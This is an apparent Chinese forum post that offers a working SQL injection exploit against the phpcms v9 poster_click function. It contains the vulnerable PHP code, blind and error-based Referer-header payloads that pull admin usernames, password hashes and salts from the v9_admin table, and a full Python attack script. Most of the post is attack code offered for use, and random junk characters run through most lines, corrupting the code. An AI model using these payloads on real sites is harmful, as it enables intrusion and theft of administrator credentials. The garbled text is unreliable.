有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
; F6 x& ^3 Y+ p) ^6 c' ]; \0 q# G5 _; m/ w% J/ |" Z0 W
问题函数\phpcms\modules\poster\index.php- p; D, ^) @* l7 p3 T# X. g" y
1 m( [5 `+ E( s; A, apublic function poster_click() {' P, ^5 r! m' l% i* Z
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;% Z% {5 o7 a3 j+ c6 ~# P9 c$ I
$r = $this->db->get_one(array('id'=>$id));9 m! W" O( p; M) w5 I
if (!is_array($r) && empty($r)) return false;5 ?) I' b) W$ O- v j3 L; |
$ip_area = pc_base::load_sys_class('ip_area');& I/ h! l! y' t
$ip = ip();3 W# r2 _# _' A: {; ~
$area = $ip_area->get($ip);
7 R- w: e1 r" C, T7 ~ Z" ~1 \& Z; V$username = param::get_cookie('username') ? param::get_cookie('username') : '';7 a5 w# l$ v$ }7 R
if($id) {# y z- o/ F" v& u
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
9 c$ \! A# d2 S& Q$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
/ q9 P( L7 ]% x! \: E' N) z}6 k [3 m% |4 v+ e1 g
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
' ^+ T9 W: n0 U% a' P* H$setting = string2array($r['setting']);
4 y) |9 b1 ?5 H$ @if (count($setting)==1) {/ s) e% J& I4 z: X' m C% V; z n
$url = $setting['1']['linkurl'];
& r, K1 A6 |6 z0 |4 J/ w6 ^( O; ^} else {
1 P3 {7 d- P; `$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
7 Q1 Y6 Q5 n/ Z" g; n}
( Z8 j9 d! [0 b. D1 G1 Uheader('Location: '.$url);
7 m5 _3 W; @4 r1 V1 f}
$ p# V% V Z2 ^! g! E" Q$ V6 u% s2 L5 X* J
9 [! @9 G$ o/ A2 \! z1 j5 ~
1 b# {5 O, H2 B* }4 W# e) F利用方式:
C4 P% q, |: }' r3 A
6 G( l% g( D9 z6 ^) D; {3 z1 h1、可以采用盲注入的手法:
# B7 x" f* }: C. {. F/ K
9 A* U1 h/ e, Oreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
7 P' U6 M' L: r. Y0 ^: D9 U, {( C1 g
通过返回页面,正常与否一个个猜解密码字段。5 U4 x1 n1 ?% g
7 b; Y& i4 {# H& l$ P7 Y
2、代码是花开写的,随手附上了:
- j) `' S! T0 h/ Z% z4 H p$ H0 q& j5 k9 U) Q4 G! u' x% ?
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#& H) g" E1 ]3 J7 p6 {9 B
; c4 {1 O7 @" s/ x9 J; j) p
此方法是爆错注入手法,原理自查。% q0 m: C7 M: X$ [
4 t; F8 O) @* x+ a
. N! R3 O: z3 ?+ c7 p
5 b* W1 o4 k' J- ]利用程序:
& q2 L8 E2 M2 Q! d% ?/ x
; O3 Z' j' V% H, G2 b9 ]7 Y#!/usr/bin/env python
6 L, Z7 n, c1 L$ Y" r) `import httplib,sys,re7 x2 }* i. i7 h S% {$ F' E" b- `
$ W& z0 l" ~+ \( _, G3 k4 zdef attack():
. M& A% {( m+ i* V6 rprint “Code by Pax.Mac Team conqu3r!”
4 k3 \5 u- V5 g7 P8 o# v: Qprint “Welcome to our zone!!!”
+ q V! z: g4 C, gurl=sys.argv[1]
8 Q) @( b* V/ X& ypaths=sys.argv[2], y) u- T% g) ?1 ]
conn = httplib.HTTPConnection(url)
4 [' o/ `5 }$ b& z8 `i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,! o) u% I* d* n' q0 r$ I1 a
“Accept”: “text/plain”,
& w$ x0 H' O% R) L* n3 d, W“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
: d) i3 {# u E5 E' S c# Lconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), `2 h" E. a% X/ H% I' ?
r1 = conn.getresponse()
8 S/ N& H) g1 f1 M& k4 Ydatas=r1.read()
2 ]7 l* j: O' f; `datas=re.findall(r”Duplicate entry \’\w+’”, datas)3 _( G; ] ^% Q/ v% o+ Q' q, A
print datas[0]
, h7 q! G, N7 ?9 p! v- N; y4 aconn.close()4 t7 o+ v1 ?9 Q3 B
if __name__==”__main__”: Y, h% j/ G4 W2 U
if len(sys.argv)<3:
' x+ U. R5 \- I% {4 S: K9 _) Vprint “Code by Pax.Mac Team conqu3r”3 d$ O( ?) Y4 t# V% a$ w
print “Usgae:”
/ C: I. Y- ]: P3 C1 ~- hprint “ phpcmsattack.py www.paxmac.org /”
8 a' I' |3 q! N& \; V) ^print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
( i3 K4 s. {0 J W* Isys.exit(1)" s8 N' g$ ]9 X
attack()3 \1 I, Y! T" K) ]
% z" m( z; l* M/ D2 M! i u1 g
|
发表于 2013-1-11 21:01:00
收藏
支持
反对